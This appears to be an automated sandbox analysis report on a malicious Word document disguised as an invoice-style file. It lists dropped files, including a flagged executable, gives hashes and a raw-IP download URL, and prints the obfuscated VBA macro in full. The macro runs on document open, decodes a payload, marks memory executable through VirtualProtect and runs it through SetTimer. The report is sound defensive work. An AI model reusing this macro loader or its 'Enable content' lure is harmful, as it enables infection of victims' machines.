Preview:	.PNG........IHDR.......8......X.L.. .IDATx..}i..F.-..\r.E.l..u..3....L....^TR-.......DF...I.e;i.:U.L&...pq.p.1.HD.Z.@.6.._cc..........>.n....2v..c.%...)..G.?\|...>k...bf......c0.sy..$...a....<.......>".=X1.....1.^I\|......\|!.....I`E..c.#.T......'.'.....$6&L1.0.H...X&".cp.l...p.>..?.@?.1.Tp.....Y...=D.]....).w=...~..yp...{x/......d}1.G.h..b."1..-}.0x...O.......<. &n...0.1...eI...."".. ....C<t..A.H..4O.L.G....v...6Bd....W{..>..;W.....E.#<..s.^...Q...B.o.=l.lB{...1.ab.$D..:WB$O..V..>..k...y~.w".....A...-.D..;.I.4b.D..E".3...1...f....J.~xv.35G&&....?.acR...P.N....)...U.J....F.I...c$... .....a..z&...1..I...D...b.A4.......U.._.D.Z...E.6.G9t..=..qj...^L.$.;...>..S&dD.X... 1...0.{~.w..P.....1.U(.....j.PM......9J..[.O2...).12swy%.3..M?NGt_.......Z..........?F..+.....[4@.=.......;.".6..i.c..qH4...Ll...8.kI....="".!..h.g7.\'......Bb.A...f..o).+..`..++..?u..<.i.M..Gvs..@w.$.2X..'.[.h.8h.3..G.g.E...3..d.)..V../$)...."%...F....~...s.1@\|.....dE.8D\|..d..........N.z..(...

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Word\~WRS{51DECAAA-E719-4ADB-922F-7BFC4F91483F}.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	1536
Entropy (8bit):	2.131668560158345
Encrypted:	false
SSDEEP:	12:DMlzfRLZRW4WZ1MFKuQ9cc3xn82l/2kwkvmElgQlRlHllGlwZZn9/vlk:4LG1ND9Pxn82Eks3UNA
MD5:	990B739DCEE177624089BD19E79B1DAA
SHA1:	572AB482803D5FE717849E8D45FE57F3A4605775
SHA-256:	2112324634ECC8A1F0B24D0A2F00502BA5148A5BC8476BA5D16B9D4597E7B892
SHA-512:	77B20E54CFC7ED47EC28428D7540FF85A436517E1D889666AAA798ACCC8D1AED18EB3207178126EA69934C127EF665806AA7F700747DCFC489CBDD61DDEE6401
Malicious:	false
Reputation:	low
Preview:	.././...T.h.i.s. .d.o.c.u.m.e.n.t. .c.r.e.a.t.e.d. .i.n. .p.r.e.v.i.o.u.s. .v.e.r.s.i.o.n. .o.f. .M.i.c.r.o.s.o.f.t. .O.f.f.i.c.e. .W.o.r.d.....T.o. .v.i.e.w. .o.r. .e.d.i.t. .t.h.i.s. .d.o.c.u.m.e.n.t.,. .p.l.e.a.s.e. .c.l.i.c.k. .. E.n.a.b.l.e. .e.d.i.t.i.n.g.. .b.u.t.t.o.n. .o.n. .t.h.e. .t.o.p. .b.a.r.,. .a.n.d. .t.h.e.n. .c.l.i.c.k. .. E.n.a.b.l.e. .c.o.n.t.e.n.t.. ..........................................................................................................................................................z.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Word\~WRS{C3FA9527-8571-4407-A5C8-BB633260A4AC}.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	1024
Entropy (8bit):	0.05390218305374581
Encrypted:	false
SSDEEP:	3:ol3lYdn:4Wn
MD5:	5D4D94EE7E06BBB0AF9584119797B23A
SHA1:	DBB111419C704F116EFA8E72471DD83E86E49677
SHA-256:	4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
SHA-512:	95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
Malicious:	false
Reputation:	high, very likely benign file
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\rm[1].htm

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
File Type:	HTML document, ASCII text
Category:	downloaded
Size (bytes):	201
Entropy (8bit):	5.110875983732391
Encrypted:	false
SSDEEP:	6:pn0+Dy9xwGObRmEr6VnetdzRx3bIGKCezocKqD:J0+oxBeRmR9etdzRxbIYez1T
MD5:	6DFF44B8B60DD046290A5420717F052E
SHA1:	2339B6BC052682B5CC618733AEEE776037485D3E
SHA-256:	2E519B2E823E2503B635A59BBC29A00170F18F86BC7F5330563188B105FF87D7
SHA-512:	02E47727BE33B93C4CA538A0E089720C0AC6D7CDC758216ECE0AD3380A75C151D9E2C6BA66A564209E3AC750720CBD3E415FA202ADE20852785D507C488076C3
Malicious:	false
Reputation:	low
IE Cache URL:	http://45.8.146.139/fhfty/82PF9MOX9VRXL73GMCXOFE8AGP5ROGT8/rm
Preview:	<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html><head>.<title>404 Not Found</title>.</head><body>.<h1>Not Found</h1>.<p>The requested URL "rm" was not found on this server.</p>.</body></html>.

C:\Users\user\AppData\Local\Temp\rECA2.tmp.exe

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	61952
Entropy (8bit):	6.1891584557780455
Encrypted:	false
SSDEEP:	768:vV+4s9C36jbgktDymekZ+bRnbSEln5IyYpamDjobj8S47:vc8ms1mibRJln5IUmDjoX07
MD5:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
SHA1:	BCC5DC3222034D3F257F1FD35889E5BE90F09B5F
SHA-256:	4E15AA13A02798E924C63537E458A09415C48DAE0E7AFD5A3D25532A2AA935EE
SHA-512:	85C94763698448275AD996805FD59A3A4789BEFB79BE2175E2BBFED1CE9A2D424500DCAF42FFA225C33FE7090F0FEDF6B7BED63168FEC64D112CD09559829AFE
Malicious:	true
Antivirus:	Antivirus: Metadefender, Detection: 0%, Browse Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: wpswireless-invoice-08.11.22.doc, Detection: malicious, Browse Filename: c.exe, Detection: malicious, Browse Filename: edicomsrl file 18.07.doc, Detection: malicious, Browse Filename: edicomsrl,document,18.07.doc, Detection: malicious, Browse Filename: rbtGr2unq7.exe, Detection: malicious, Browse Filename: SecuriteInfo.com.Generic.Cryptor.X.E2AE8007.47.dll, Detection: malicious, Browse Filename: SecuriteInfo.com.Generic.Cryptor.X.E2AE8007.47.dll, Detection: malicious, Browse Filename: QABqf4Xbw3.exe, Detection: malicious, Browse Filename: ntelos.file.06.27.2022.doc, Detection: malicious, Browse Filename: g.exe, Detection: malicious, Browse Filename: S.exe, Detection: malicious, Browse Filename: rB0luE6pL6.dll, Detection: malicious, Browse Filename: I3Iz02L0Am.dll, Detection: malicious, Browse Filename: svc32.dll, Detection: malicious, Browse Filename: SecuriteInfo.com.DLOADER.Trojan.15098.dll, Detection: malicious, Browse Filename: sIhckM7o37.exe, Detection: malicious, Browse Filename: IhIrwzRKIW.exe, Detection: malicious, Browse Filename: 12CC7A3E17B45E971B1B950A6418E977D3FEDE2763FD7.exe, Detection: malicious, Browse Filename: MkFX3RptDN.exe, Detection: malicious, Browse Filename: zyvvMPPgTM.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............l..l..l......l...o...l...h..l..m.o.l...m..l...i..l...e...l....l...n..l.Rich.l.................PE..L...4^?..................b..........Pa............@..........................@............@.............................................hg...................0..D.......T........................... .......................lm..`....................text....a.......b.................. ..`.data................f..............@....idata...............h..............@..@.didat..............................@....rsrc...hg.......h..................@..@.reloc..D....0......................@..B................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\yE9E2.tmp.dll

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
File Type:	HTML document, ASCII text
Category:	dropped
Size (bytes):	201
Entropy (8bit):	5.110875983732391
Encrypted:	false
SSDEEP:	6:pn0+Dy9xwGObRmEr6VnetdzRx3bIGKCezocKqD:J0+oxBeRmR9etdzRxbIYez1T
MD5:	6DFF44B8B60DD046290A5420717F052E
SHA1:	2339B6BC052682B5CC618733AEEE776037485D3E
SHA-256:	2E519B2E823E2503B635A59BBC29A00170F18F86BC7F5330563188B105FF87D7
SHA-512:	02E47727BE33B93C4CA538A0E089720C0AC6D7CDC758216ECE0AD3380A75C151D9E2C6BA66A564209E3AC750720CBD3E415FA202ADE20852785D507C488076C3
Malicious:	true
Preview:	<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html><head>.<title>404 Not Found</title>.</head><body>.<h1>Not Found</h1>.<p>The requested URL "rm" was not found on this server.</p>.</body></html>.

C:\Users\user\AppData\Local\Temp\~DF32F8B01FD4175FF7.TMP

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
File Type:	Composite Document File V2 Document, Cannot read section info
Category:	modified
Size (bytes):	50176
Entropy (8bit):	4.446577513207149
Encrypted:	false
SSDEEP:	768:iOxHjpXzfL/Op0tzHgq6HcOMyb3pQ9Wm:PHNXzfLGp0tjuq
MD5:	0F4002523504A72D1C1ECCA6461FD0FE
SHA1:	4F57980D01264F72837838B668AA512E28227684
SHA-256:	E9584CB638EEC3A1A65E7B9BF9DA817619F897806667B6E9768A25767BD37A4B
SHA-512:	D345BA9E497AFB98F865FCF7616AA0648C419463E1F36E3DA43F79F4B72C1F756D2178043B05F18ED4AC49FFB6609B394A43916A519416F5FF93E392A5D9023B
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	......................>...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................F...........&........................................................................................................... ...!..."...#...$...%.......'...(...)...*...+...,...-......./...0...1...2...3...4...5...6...7.......9...:...;...<...=.......?...@...A...B...C...D...E...8...]...H...I...J...M...L.......N...O...P...Y...R...S...T...U...V...W...X...K...Z...[...\...^......._...`...........................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\airequipmentcorp-doc-08.11.2022.doc.LNK

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Tue Mar 8 15:31:45 2022, mtime=Fri Aug 12 00:08:24 2022, atime=Fri Aug 12 00:08:17 2022, length=2203070, window=hide
Category:	dropped
Size (bytes):	1160
Entropy (8bit):	4.662753215532605
Encrypted:	false
SSDEEP:	12:8K8vWUJ+uElPCH2H4Ah0Y6av+W64INsLt4LGKAjAN/+KX9LN4xLG8DQttRI5E4tn:8K1pu38PANGM9xGDGtia7aB6m
MD5:	F058DD614E7BAD188022144BA4DA6D4B
SHA1:	57455EDB238AEEDB74260805ED26141BD7A2349D
SHA-256:	E66BADE84CFDB5540C509B4DC79AF1F6715E4860CE0BEB8A58AC3E44A9F8DB5B
SHA-512:	C0B696144F870441E27A81B243EADC6B67B5B3AB5CAF9FCAF4F95A333FBCA8EC40A288BCD7F9DE10094743B1DF29D15764539D7624A53FC7CB1DD0759B6B84D1
Malicious:	true
Preview:	L..................F.... ....9..3...l..............!..........................P.O. .:i.....+00.../C:\...................x.1......N....Users.d......L...U......................:.....q\|..U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....P.1.....hT....user.<.......Ny..U.......S........................h.a.r.d.z.....~.1.....hT....Desktop.h.......Ny..U.......Y..............>......+..D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......2...!..U.. .AIREQU~1.DOC..x......hT...U......h.....................S./.a.i.r.e.q.u.i.p.m.e.n.t.c.o.r.p.-.d.o.c.-.0.8...1.1...2.0.2.2...d.o.c.......i...............-.......h...........>.S......C:\Users\user\Desktop\airequipmentcorp-doc-08.11.2022.doc..:.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.a.i.r.e.q.u.i.p.m.e.n.t.c.o.r.p.-.d.o.c.-.0.8...1.1...2.0.2.2...d.o.c.........:..,.LB.)...As...`.......X.......506013...........!a..%.H.VZAj.../............-..!a..%.H.VZAj.../............-.............1SPS.XF.L8C....&.m.q............/...S.-.1

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	121
Entropy (8bit):	4.7517053629131425
Encrypted:	false
SSDEEP:	3:bDuMJlcMQJM3aBYUULX9TLBCmX1QM3aBYUULX9TLBCv:bC3J+LX9HB6+LX9HBs
MD5:	B530AD95DAC76D5DA42BA8619EB35F40
SHA1:	CE9DD98B6B91A9677E5C56BE72AF625F120D59C6
SHA-256:	DB19F88917C4006CC2BE0FFACBC095FBF53982280797423D930869F4194EF767
SHA-512:	0515B44EC6A9CC5D8B1686632958CD1B337F7C4C9516B0D613454CEFE75586374F411F53EF74062272DC04744589A4907FF3076BC6DC13B710872A8C0EEC93B1
Malicious:	false
Preview:	[folders]..Templates.LNK=0..airequipmentcorp-doc-08.11.2022.doc.LNK=0..[doc]..airequipmentcorp-doc-08.11.2022.doc.LNK=0..

C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	162
Entropy (8bit):	2.693120269145364
Encrypted:	false
SSDEEP:	3:Rl/ZdYx7lqKHxee1lzlqKD6lppJ+xl/:RtZWccYe1lkYGpJOt
MD5:	D8F53F403FF9B5DC094F8EB0B3AC9ABD
SHA1:	CB179015D23B12583305CFACDD70A28756E621DE
SHA-256:	4BE62515AFE61F2D4C7D5240E9B64C55DF38CA8B9AEC0848AC18D2D3B31DD362
SHA-512:	5802A1322DB5769C14C654F95B2007133E7D5C58EE4FE1B8501681514A91A72F4A7875D4D4F77294EE6925345E56DE35F7A51552120459ABABEA3B9F452A1ED6
Malicious:	false
Preview:	.pratesh................................................p.r.a.t.e.s.h...l.l.....?O............H.......6C........;O............T.......6C........7O......Ul.`@.....

C:\Users\user\AppData\Roaming\Microsoft\UProof\ExcludeDictionaryEN0409.lex

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
File Type:	Little-endian UTF-16 Unicode text, with no line terminators
Category:	dropped
Size (bytes):	2
Entropy (8bit):	1.0
Encrypted:	false
SSDEEP:	3:Qn:Qn
MD5:	F3B25701FE362EC84616A93A45CE9998
SHA1:	D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
SHA-256:	B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
SHA-512:	98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
Malicious:	false
Preview:	..

C:\Users\user\Desktop\~$requipmentcorp-doc-08.11.2022.doc

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	162
Entropy (8bit):	2.693120269145364
Encrypted:	false
SSDEEP:	3:Rl/ZdYx7lqKHxee1lzlqKD6lppJ+xl/:RtZWccYe1lkYGpJOt
MD5:	D8F53F403FF9B5DC094F8EB0B3AC9ABD
SHA1:	CB179015D23B12583305CFACDD70A28756E621DE
SHA-256:	4BE62515AFE61F2D4C7D5240E9B64C55DF38CA8B9AEC0848AC18D2D3B31DD362
SHA-512:	5802A1322DB5769C14C654F95B2007133E7D5C58EE4FE1B8501681514A91A72F4A7875D4D4F77294EE6925345E56DE35F7A51552120459ABABEA3B9F452A1ED6
Malicious:	false
Preview:	.pratesh................................................p.r.a.t.e.s.h...l.l.....?O............H.......6C........;O............T.......6C........7O......Ul.`@.....

Static File Info

General

File type:	Zip archive data, at least v2.0 to extract
Entropy (8bit):	7.993807361796733
TrID:	Word Microsoft Office Open XML Format document (49504/1) 49.01% Word Microsoft Office Open XML Format document (43504/1) 43.07% ZIP compressed archive (8000/1) 7.92%
File name:	airequipmentcorp-doc-08.11.2022.doc
File size:	2297841
MD5:	84904f679048e45c43210c22f8fcc5df
SHA1:	7e23ee02e2543e51a2ad97b2ede96c441d34e6eb
SHA256:	78c296d80214d887820a3c55bc06fbc42b17db90fb01aef0766365b383f1e7f1
SHA512:	c7f757c4b357b72f8edc9988ef99dd73b2d0fb9c48f928a3d806c57fbc168b8d2d141a625a5ce76a4c7a6533708984d200031bc56d44b6d756e512cfd823b3d7
SSDEEP:	49152:tqI9FlNmHCQkEV8Uxd938Vx8Z3rm06VNN9hTobO3b1:4I9F3miQkimVi3rD6VP4aB
TLSH:	F8B53302D0155771C5F1C8F98C5AA1B842B8D2321521EE5F4B3CB81ACBBDDCA7B85ADE
File Content Preview:	PK..........!..U~............._rels/.rels...J.@............4.E..D.....$....T..w-..j........\|.zs..z..z.X.%(v......6O.{PI........`S__._x .C..CR....:....t..R......hI.3..H.Q...;..=..y... n.......yo.......[vrf..A..6..3[.>_...-K....\NH!....<..r...E.B..P...<_.

File Icon


Icon Hash:	74f4c4c6c1cac4d8

Static OLE Info

General

Document Type:	OpenXML
Number of OLE Files:	1

OLE File "/opt/package/joesandbox/database/analysis/682577/sample/airequipmentcorp-doc-08.11.2022.doc"

Indicators

Has Summary Info:
Application Name:
Encrypted Document:	False
Contains Word Document Stream:	True
Contains Workbook/Book Stream:	False
Contains PowerPoint Document Stream:	False
Contains Visio Document Stream:	False
Contains ObjectPool Stream:	False
Flash Objects Count:	0
Contains VBA Macros:	True

Streams with VBA

VBA File Name: ThisDocument.cls, Stream Size: 2740

General
Stream Path:	VBA/ThisDocument
VBA File Name:	ThisDocument.cls
Stream Size:	2740
Data ASCII:	. . A t t r i b u t . e V B _ N a m . e = " T h i . s D o c u m e n . t " . . . B a s . . 1 N o r m a l . . . V G l o b a l ! . S p a c . l F a . l s e . J C r e a . t a b l . . P r e d e c l a . . I d . . # T r u . " E x p . o s e . . T e m p . l a t e D e r i . v . $ C u s t o m l i z C . P . . . . . D . ? P t r S a . f e F u n c t i o n . . . L i b " u s e . r 3 2 " A l i . a s " S e t T . i m e r " ( B . y V a l . . . . . . . A s L o n g , , { . . . . . . , . . ) .
Data Raw:	01 bc b4 00 41 74 74 72 69 62 75 74 00 65 20 56 42 5f 4e 61 6d 00 65 20 3d 20 22 54 68 69 00 73 44 6f 63 75 6d 65 6e 10 74 22 0d 0a 0a 8c 42 61 73 01 02 8c 31 4e 6f 72 6d 61 6c 02 2e 19 56 47 6c 6f 62 61 6c 21 01 aa 53 70 61 63 01 6c 46 61 08 6c 73 65 0c 4a 43 72 65 61 10 74 61 62 6c 15 1f 50 72 65 20 64 65 63 6c 61 00 06 49 64 11 00 23 54 72 75 0d 22 45 78 70 08 6f 73 65 14 1c 54

VBA Code

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Declare PtrSafe Function  Lib "user32" Alias "SetTimer" (ByVal  As LongPtr, ByVal  As LongPtr, ByVal  As LongPtr, ByVal  As LongPtr) As LongPtr
Private Declare PtrSafe Function  Lib "kernel32" Alias "VirtualProtect" (ByVal  As LongPtr, ByVal  As LongPtr, ByVal  As LongPtr,  As LongPtr) As LongPtr
Private Declare PtrSafe Function  Lib "user32" Alias "KillTimer" (ByVal  As LongPtr, ByVal  As LongPtr) As LongPtr
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
Function (, )
     = Mid(,  + 1, 1)
End Function
Function ()
     = 2
    End Function
Function (, Optional  = False)
    If  Then
        Set  = GetObject()
    Else
        Set  = ((), )
    End If
    Set  = 
    End Function
Private Sub Document_Open()
    Dim () As Byte
    If () Then
         = ((ufVM1s65i("NZZaVTBG")).Value)
    Else
         = ((ufVM1s65i("ZMgF0Do")).Value)
    End If
    Dim  As LongPtr
    Dim  As LongPtr
    Dim  As LongPtr
    Dim  As LongPtr
     = () + 1
     = VarPtr((0))
     , , 64, VarPtr()
            ()(ufVM1s65i("ep8eTQyOp7")) = ufVM1s65i("oBmKdkNN7h")
         = (0, , 1, )
     1
     0, 
    ().Remove (ufVM1s65i("qixj5ym_7VKW_"))
    ().Remove (ufVM1s65i("DmW1wZf_e"))
    ReDim (1)
End Sub
Function (, Optional  = False)
    If  Then
         = UBound()
    Else
         = ((), )
    End If
     = 
    End Function
Function (, Optional  = False)
    If  Then
         = ()
    Else
         = ((), )
    End If
     = 
    End Function
Function ()
     = 10
    End Function
Function (Optional  = False)
    If  Then
         = Timer()
    Else
         = (())
    End If
     = 
    End Function
Function (Optional  = False)
    If  Then
        Set  = CallByName((ufVM1s65i("AzhECiJUk2")), ufVM1s65i("bYZwWl"), VbGet, ufVM1s65i("cR3qp4Grta"))
    Else
        Set  = (())
    End If
    Set  = 
    End Function
Function ()
     = 5
    End Function
Function (, Optional  = False)
    If  Then
        Set  = CallByName((), ufVM1s65i("QaSy54aHeh"), VbGet, )
    Else
        Set  = ((), )
    End If
    Set  = 
    End Function
Function ()
    ReDim (() - 1) As Byte
    Dim  As Long,  As Long
    Dim :  = ufVM1s65i("NNVbeN3IupXq") & ufVM1s65i("Sv3OehBI5_")
    For  = 0 To () - 1 Step 2
         =  / 2
        () = 255 - ( & (, ) & (,  + 1))
    Next
     = 
End Function
Function ()
     = 3
    End Function
Function ()
     = 6
    End Function
Function ()
     = 11
    End Function
Function ()
     = 1
    End Function
Function ()
     = 7
    End Function
Public Function ufVM1s65i(strInput)
        ufVM1s65i = StrReverse(ActiveDocument.CustomDocumentProperties(strInput))
    End Function
Function ()
    #If Win64 Then
         = True
    #Else
         = False
    #End If
End Function
Function ()
     = 9
    End Function
Function (Optional  = False)
    If  Then
        Set  = ActiveDocument
    Else
        Set  = (())
    End If
    Set  = 
    End Function
Function ()
     = 0
    End Function
Function (, Optional  = False)
    If  Then
         = Len()
    Else
         = ((), )
    End If
     = 
    End Function
Function (, Optional  = False)
    If  Then
         = CDec()
    Else
         = ((), )
    End If
     = 
    End Function
Function ()
     = 8
    End Function
Function (, , Optional  = False)
    If  Then
         = Mid(,  + 1, 1)
    Else
         = ((), , )
    End If
     = 
    End Function
Sub (w)
    Dim  As Long
    Dim  As Long
     = () + ()
    Do
         = ()
        DoEvents
    Loop Until  > 
End Sub
Function (, Optional  = False)
    If  Then
        Set  = CallByName((), ufVM1s65i("NZpkQxhY7T"), VbGet, )
    Else
        Set  = ((), )
    End If
    Set  = 
    End Function
Function ()
     = 4
    End Function
Function (, Optional  = False)
    If  Then
         = VarPtr()
    Else
         = ((), )
    End If
     = 
    End Function
Function (, Optional  = Empty, Optional  = Empty, Optional  = Empty)
    Select Case 
            Case ()
                Set  = (, True)
            Case ()
                Set  = (, True)
            Case ()
                Set  = (True)
            Case ()
                Set  = (True)
            Case ()
                Set  = (, True)
            Case ()
                 = (, True)
            Case ()
                 = (, True)
            Case ()
                 = (, True)
            Case ()
                 = (, True)
            Case ()
                 = (, , True)
            Case ()
                 = (True)
            Case ()
                 = (, True)
        End Select
End Function

Streams

Stream Path: PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 369

General
Stream Path:	PROJECT
File Type:	ASCII text, with CRLF line terminators
Stream Size:	369
Entropy:	5.245272756909884
Base64 Encoded:	True
Data ASCII:	I D = " { E F 2 1 A C D 1 - 0 7 C 6 - 4 1 0 B - 8 1 6 A - F 3 5 B E 5 6 2 A 9 A 6 } " . . D o c u m e n t = T h i s D o c u m e n t / & H 0 0 0 0 0 0 0 0 . . N a m e = " P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " F 5 F 7 1 8 1 1 F 8 0 2 F C 0 2 F C 0 2 F C 0 2 F C " . . D P B = " E A E 8 0 7 2 0 F D 2 1 F D 2 1 F D " . . G C = " D F D D 3 2 3 F D 2 C 1 C 6 C 2 C 6 C 2 3 9 " . . . . [ H o s t E x t e n d e r I n f
Data Raw:	49 44 3d 22 7b 45 46 32 31 41 43 44 31 2d 30 37 43 36 2d 34 31 30 42 2d 38 31 36 41 2d 46 33 35 42 45 35 36 32 41 39 41 36 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 54 68 69 73 44 6f 63 75 6d 65 6e 74 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 4e 61 6d 65 3d 22 50 72 6f 6a 65 63 74 22 0d 0a 48 65 6c 70 43 6f 6e 74 65 78 74 49 44 3d 22 30 22 0d 0a 56 65 72 73 69 6f 6e 43 6f 6d 70 61 74 69

Stream Path: PROJECTwm, File Type: data, Stream Size: 41

General
Stream Path:	PROJECTwm
File Type:	data
Stream Size:	41
Entropy:	3.0773844850752607
Base64 Encoded:	False
Data ASCII:	T h i s D o c u m e n t . T . h . i . s . D . o . c . u . m . e . n . t . . . . .
Data Raw:	54 68 69 73 44 6f 63 75 6d 65 6e 74 00 54 00 68 00 69 00 73 00 44 00 6f 00 63 00 75 00 6d 00 65 00 6e 00 74 00 00 00 00 00

Stream Path: VBA/_VBA_PROJECT, File Type: ISO-8859 text, with no line terminators, Stream Size: 7

General
Stream Path:	VBA/_VBA_PROJECT
File Type:	ISO-8859 text, with no line terminators
Stream Size:	7
Entropy:	1.8423709931771088
Base64 Encoded:	False
Data ASCII:	a . . .
Data Raw:	cc 61 ff ff 00 00 00

Stream Path: VBA/__SRP_2, File Type: data, Stream Size: 5116

General
Stream Path:	VBA/__SRP_2
File Type:	data
Stream Size:	5116
Entropy:	1.9229388656001654
Base64 Encoded:	False
Data ASCII:	r U @ . . . . . . . . . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . . 8 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . P . . . . . . . . . . . " . . . . . . . . . . . . . . . q . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . A . . . . . . . . . . . . . . . ` . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ` ) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	72 55 40 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 38 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 03 00 50 00 00 00 00 00 00 00 00 00 00 00 22 00 1f 00 00 00 00 00 01 00 01 00 00 00 01 00 71 07 00 00 00 00 00 00 00 00 00 00 a1 07 00 00 00 00 00 00 00 00 00 00 d1 07

Stream Path: VBA/__SRP_3, File Type: data, Stream Size: 2724

General
Stream Path:	VBA/__SRP_3
File Type:	data
Stream Size:	2724
Entropy:	2.6943726453670886
Base64 Encoded:	False
Data ASCII:	r U @ . . . . . . . . . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . ` . . . . . . . . . . . . . . . p . . . . . . . . . . . . . . . . . 1 . . . . . . . . . . . Q . . . . . . . . . . . q . . . . . . . . . . . . . . . . . . . . . . . . . ` . q . . . . . . . . . . . , . . p . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1 . . . . . . . . . . . . . . . . . . . . . . . Q . P . 1 . . . . . . . . . . . \\ .
Data Raw:	72 55 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1a 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 02 00 ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00 78 00 00 00 08 00 60 00 a1 08 00 00 00 00 00 00 00 00 00 00 00 00 04 70 10 00 fe ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00

Stream Path: VBA/dir, File Type: data, Stream Size: 486

General
Stream Path:	VBA/dir
File Type:	data
Stream Size:	486
Entropy:	6.306571446096894
Base64 Encoded:	True
Data ASCII:	. . . . . . . . . . 0 . . . . . . H . . . . . . . . . . . P r o j e c t . Q . ( . . @ . . . . . = . . . . l . . . . . . . . R d - . . . " . < . . . . r s t d o . l e > . . s . t . . d . o . l . e . ( . . h . . ^ . . * \\ . G { 0 0 0 2 0 4 3 0 - . . . . C . . . . . 4 6 } # 2 . 0 # . 0 # C : \\ W i n . d o w s \\ s y s @ t e m 3 2 \\ . e 2 . . t l b # O L E . A u t o m a t . i o n . E N o r ( m a l E N C r . m . a F . . c E C . . . . . m . ! O f f i c g O . f . i . c g . . g 2 D F 8 D 0 . 4 C - 5 B F A -
